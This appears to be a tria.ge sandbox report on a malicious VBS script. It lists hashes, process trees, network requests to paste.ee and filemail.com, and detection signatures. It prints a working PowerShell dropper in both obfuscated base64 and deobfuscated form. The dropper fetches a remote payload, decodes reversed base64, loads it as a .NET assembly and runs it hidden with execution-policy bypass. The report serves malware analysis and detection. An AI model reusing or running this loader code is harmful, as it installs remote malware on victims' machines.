Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

76cef289ab...a2.vbs

windows7-x64

10

76cef289ab...a2.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    12/11/2024, 02:30 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2.vbs

  • Size

    12KB

  • MD5

    8a330624d5189d9bcd491d93c29624c4

  • SHA1

    b89dd3334cd355360ae7e6f85a060dbe4de9d01d

  • SHA256

    76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2

  • SHA512

    9af32c229db64bb133a39e7e3ec12dd269d971734fe2e46c61c0167696d6dc43c7ad274e7cbbcb0c41ac529a3ccdbb2a6e04ee1807cdfbe1dd3af11462016685

  • SSDEEP

    96:khBZNNgct8LOgrf8x/JIcBkiYM1z9jRFtRQLNkOAhqL5s7n1muCweU:YBZNUOgrf6/JIcBkiYM1zbuLi7Aub

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
invoke-expression "$imageUrl = 'https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.dstep/pop/ue.prgxamygrene.gig//:ptth', 'desativado', 'desativado', 'desativado', 'desativado', '1', 'colorcpl', 'desativado', 'desativado','desativado','desativado','desativado','1','desativado'));"
3
4
# powershell snippet 1
5
$imageurl = "https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f "
6
$webclient = new-object system.net.webclient
7
$imagebytes = $webclient.downloaddata("https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f ")
8
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
9
$startflag = "<<BASE64_START>>"
10
$endflag = "<<BASE64_END>>"
11
$startindex = $imagetext.indexof("<<BASE64_START>>")
12
$endindex = $imagetext.indexof("<<BASE64_END>>")
13
$startindex -ge 0 -and $endindex -gt $startindex
14
$startindex = $startflag.length
15
$base64length = $endindex - $startindex
16
$base64command = $imagetext.substring($startindex, $base64length)
17
$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]
18
$commandbytes = [system.convert]::frombase64string($base64reversed)
19
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
20
$vaimethod = ([dnlib.io.home]).getmethod("VAI")
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\emksjAafCReiQSFZxSk.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNoZUxMSURbMV0rJHNoRUxMSURbMTNdKydYJykgKCgnV0V3aW1hZ2VVcmwgPSBUb1JodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maScrJ2xlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0RycrJ3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdicrJ2lkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MCcrJzRmIFRvUjtXRXd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQycrJ2xpZW50O1dFd2ltYWdlQnl0ZXMgPSBXRXd3ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKFdFd2ltYWdlVXJsKTtXRXdpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4JysnLicrJ0dldFN0cmluZyhXRXdpbWFnZUJ5dGVzKTtXRXdzdGFydEZsYWcgPScrJyBUb1I8JysnPEJBU0U2NF9TVEFSVD4+VG9SO1dFd2VuZEZsYWcgPSBUb1I8PEJBU0U2NF9FTkQ+PlRvUjtXRXdzdGFydEluZCcrJ2V4JysnID0gV0V3aScrJ21hZ2VUZXh0LkluJysnZGV4T2YoV0V3c3RhcnRGbGFnKTtXRXcnKydlJysnbmRJbmRleCA9IFdFd2ltYWdlVGV4dC5JbmRleE9mKFdFd2VuZEZsYWcpO1dFd3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXRXdlbmRJbmRleCAtZ3QgV0V3c3RhcnRJbmRleDtXRXdzdGFydEluZGV4ICs9IFdFd3N0YXJ0RmxhZy5MZW5ndGg7V0V3YicrJ2FzZTY0TGUnKyduZ3RoID0gV0V3ZW5kSW5kZXggLSBXRXdzdGFydEluZGV4O1dFd2Jhc2U2NENvbW1hbmQnKycgPSBXRXdpbWFnZVRleCcrJ3QuJysnU3Vic3RyaW5nKFdFd3N0YXJ0SW5kZXgsIFdFd2Jhc2U2NExlbmd0aCk7V0V3YmFzZTY0UmUnKyd2ZXJzZWQgPSAtam9pbiAnKycoV0V3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHRkdyBGb3JFYWNoLU9iamVjdCB7IFdFd18gfSlbLTEuLi0oV0V3YmFzZTY0Q29tbWFuZC5MZW5ndGgpXScrJztXRXdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0JysnU3RyaW5nKFdFd2Jhc2U2NFJldmVyc2VkKTtXRXdsb2FkZWQnKydBJysnc3NlbWJseScrJyA9IFtTJysneXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYScrJ2QoV0V3Y29tbWFuZEJ5dCcrJ2VzKTtXRXd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKFRvUlZBSVRvUik7V0V3dmFpTWV0aG9kLkludm9rZShXRXdudWxsLCBAKFRvUnR4dC5kc3RlcC9wb3AvdWUucHJneGFteWdyZW5lLmdpZy8vOnB0dGhUb1IsIFRvUmRlc2F0aXZhZCcrJ29Ub1IsICcrJ1RvUmRlc2F0aXZhZG8nKydUb1IsIFRvUmRlc2F0aXZhZG9Ub1IsIFRvUmRlc2F0aScrJ3ZhZG9UJysnb1IsIFRvUjFUb1IsIFRvUmNvbG9yY3BsVG9SLCBUb1JkJysnZXNhdGl2YWRvVG9SLCBUb1JkZXNhdGl2YWRvVG9SLFRvUmRlJysnc2F0aXZhZG9Ub1IsVG9SZGVzYXRpdmFkb1RvUixUb1JkZXNhdGl2YWRvVG9SLFRvUjFUb1IsVG9SZGVzYScrJ3RpdmFkb1RvUiknKycpOycpLlJlUGxhY2UoJ3RkdycsW1NUckluZ11bQ0hBUl0xMjQpLlJlUGxhY2UoJ1RvUicsW1NUckluZ11bQ0hBUl0zOSkuUmVQbGFjZSgnV0V3JyxbU1RySW5nXVtDSEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sheLLID[1]+$shELLID[13]+'X') (('WEwimageUrl = ToRhttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStG'+'rnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62c1730945176a090'+'4f ToR;WEwwebClient = New-Object System.Net.WebC'+'lient;WEwimageBytes = WEwwebClient'+'.DownloadData(WEwimageUrl);WEwimageText = [System.Text.Encoding]::UTF8'+'.'+'GetString(WEwimageBytes);WEwstartFlag ='+' ToR<'+'<BASE64_START>>ToR;WEwendFlag = ToR<<BASE64_END>>ToR;WEwstartInd'+'ex'+' = WEwi'+'mageText.In'+'dexOf(WEwstartFlag);WEw'+'e'+'ndIndex = WEwimageText.IndexOf(WEwendFlag);WEwstartIndex -ge 0 -and WEwendIndex -gt WEwstartIndex;WEwstartIndex += WEwstartFlag.Length;WEwb'+'ase64Le'+'ngth = WEwendIndex - WEwstartIndex;WEwbase64Command'+' = WEwimageTex'+'t.'+'Substring(WEwstartIndex, WEwbase64Length);WEwbase64Re'+'versed = -join '+'(WEwbase64Command.ToCharArray() tdw ForEach-Object { WEw_ })[-1..-(WEwbase64Command.Length)]'+';WEwcommandBytes = [System.Convert]::FromBase64'+'String(WEwbase64Reversed);WEwloaded'+'A'+'ssembly'+' = [S'+'ystem.Reflection.Assembly]::Loa'+'d(WEwcommandByt'+'es);WEwvaiMethod = [dnlib.IO.Home].GetMethod(ToRVAIToR);WEwvaiMethod.Invoke(WEwnull, @(ToRtxt.dstep/pop/ue.prgxamygrene.gig//:ptthToR, ToRdesativad'+'oToR, '+'ToRdesativado'+'ToR, ToRdesativadoToR, ToRdesati'+'vadoT'+'oR, ToR1ToR, ToRcolorcplToR, ToRd'+'esativadoToR, ToRdesativadoToR,ToRde'+'sativadoToR,ToRdesativadoToR,ToRdesativadoToR,ToR1ToR,ToRdesa'+'tivadoToR)'+');').RePlace('tdw',[STrIng][CHAR]124).RePlace('ToR',[STrIng][CHAR]39).RePlace('WEw',[STrIng][CHAR]36) )"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2604

Network

  • flag-us
    DNS
    paste.ee
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    paste.ee
    IN A
    Response
    paste.ee
    IN A
    172.67.187.200
    paste.ee
    IN A
    104.21.84.67
  • flag-us
    GET
    http://paste.ee/d/VTRKt
    WScript.exe
    Remote address:
    172.67.187.200:80
    Request
    GET /d/VTRKt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Tue, 12 Nov 2024 02:31:00 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Location: https://paste.ee/d/VTRKt
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2F1I9sG7v9kTqnIEYNSQe3SpIFSl2%2FipDgPr73sJEs%2FngUqSqRNX9K7oUl9gBa%2FuxVYqxdbgIzBbXA218YiOifmO3Mocjt1qmmJYFD0n%2BQ1pYw%2FK%2FBs6Zb003A%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e131a70eabed1fd-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=41193&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    GET
    https://paste.ee/d/VTRKt
    WScript.exe
    Remote address:
    172.67.187.200:443
    Request
    GET /d/VTRKt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 200 OK
    Date: Tue, 12 Nov 2024 02:31:01 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fk4SYyS%2FRu5nHv7Zp3EIQYwYvPcIq5t1gUfhM3AK70Y88gkSJjjX8B8QjlUHifMXhl%2B1XqFHGO%2F%2F8ON0lrRTk8QK%2Bg18mby3lVr2r34CXFJFtBPjdY6HRPjuFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e131a73cf793864-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=44472&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=459&delivery_rate=86561&cwnd=253&unsent_bytes=0&cid=f68edf414fb37d79&ts=685&x=0"
  • flag-us
    DNS
    1017.filemail.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    1017.filemail.com
    IN A
    Response
    1017.filemail.com
    IN CNAME
    ip.1017.filemail.com
    ip.1017.filemail.com
    IN A
    142.215.209.78
  • 172.67.187.200:80
    http://paste.ee/d/VTRKt
    http
    WScript.exe
    403 B
     1.2kB
     5
    4

    HTTP Request

    GET http://paste.ee/d/VTRKt

    HTTP Response

    301
  • 172.67.187.200:443
    https://paste.ee/d/VTRKt
    tls, http
    WScript.exe
    3.8kB
     151.9kB
     72
    134

    HTTP Request

    GET https://paste.ee/d/VTRKt

    HTTP Response

    200
  • 142.215.209.78:443
    1017.filemail.com
    tls
    powershell.exe
    259 B
     92 B
     3
    2
  • 142.215.209.78:443
    1017.filemail.com
    tls
    powershell.exe
    259 B
     92 B
     3
    2
  • 8.8.8.8:53
    paste.ee
    dns
    WScript.exe
    54 B
     86 B
     1
    1

    DNS Request

    paste.ee

    DNS Response

    172.67.187.200
    104.21.84.67

  • 8.8.8.8:53
    1017.filemail.com
    dns
    powershell.exe
    63 B
     96 B
     1
    1

    DNS Request

    1017.filemail.com

    DNS Response

    142.215.209.78

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    ed91ecadd86067a6f3e03819d160c6b8

    SHA1

    43d8fb130f57b3c779d93dbb7d02037082017e83

    SHA256

    8dac40eb7f16bb0a3e52fda1072fe1767a016b69bae1c5948942411473bebbc0

    SHA512

    71768eb0bcb0301ef3d983c339ec0f3ac72c82d70487da6d2fa20c9c76d45bf1acf990feb1f026fe0d77720cb8de14bb68121b58138bd1b42f5eaeb0b844c0e1

    Download Submit

  • C:\Users\Admin\AppData\Roaming\emksjAafCReiQSFZxSk.vbs
    Filesize

    1KB

    MD5

    c1ab9e3c7a5a70259e486e1b35e791dd

    SHA1

    f0f6ebff9ebfac13bf995bccf8193daf58827652

    SHA256

    6cc7e3be7d1abd44b8cd67b15cbc5c86ee366edc63da01e0b1b7544982551738

    SHA512

    9d705558cd936e603ae1db6860fa1f2a7337acf8df787ca1acb9a32c96d0345834b705aac1c503215127fefe01057bd789be276cc2a377dc29c856e0b78fd9d2

    Download Submit

  • memory/2748-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2748-9-0x00000000020F0000-0x00000000020F8000-memory.dmp

    Filesize

    32KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.